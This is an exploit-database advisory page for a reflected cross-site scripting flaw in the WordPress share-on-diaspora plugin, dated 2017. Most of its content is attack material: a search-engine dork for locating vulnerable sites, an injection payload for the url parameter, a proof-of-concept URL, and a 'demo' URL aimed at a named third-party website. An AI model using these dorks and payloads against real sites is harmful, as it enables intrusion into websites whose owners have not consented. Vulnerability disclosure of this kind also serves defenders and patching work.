WordPress share-on-diaspora Plugin Cross Site Scripting (XSS)

2017.08.18
us Gucert.ir (US) us
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/plugins/share-on-diaspora/new_window.php?url=

[+] Title: WordPress share-on-diaspora Plugin Cross Site Scripting (XSS) [+] Date: 2017/08/17 [+] Author: APA Golestan - GuCert [+] Vendor Homepage: www.WordPress.org [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable File: /new_window.php [+] Dorks : inurl:/wp-content/plugins/share-on-diaspora/new_window.php?url= intext:"by Share on Diaspora plugin for WordPress." ### POC: [+] Xss Alert Code: ”><svg onload=alert(/xss/)> [+] http://site/wp-content/plugins/share-on-diaspora/new_window.php?url=”><svg onload=alert(/xss/)> ### Demo: [+] Photo: http://gucert.ir/files/2017/08/apa-1.jpg [+] http://openlifechallenge.cc/wp-content/plugins/share-on-diaspora/new_window.php?url=%E2%80%9D%3E%3Csvg%20onload=alert(/xss/)%3E ### Credits: [+] Gucert.ir


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top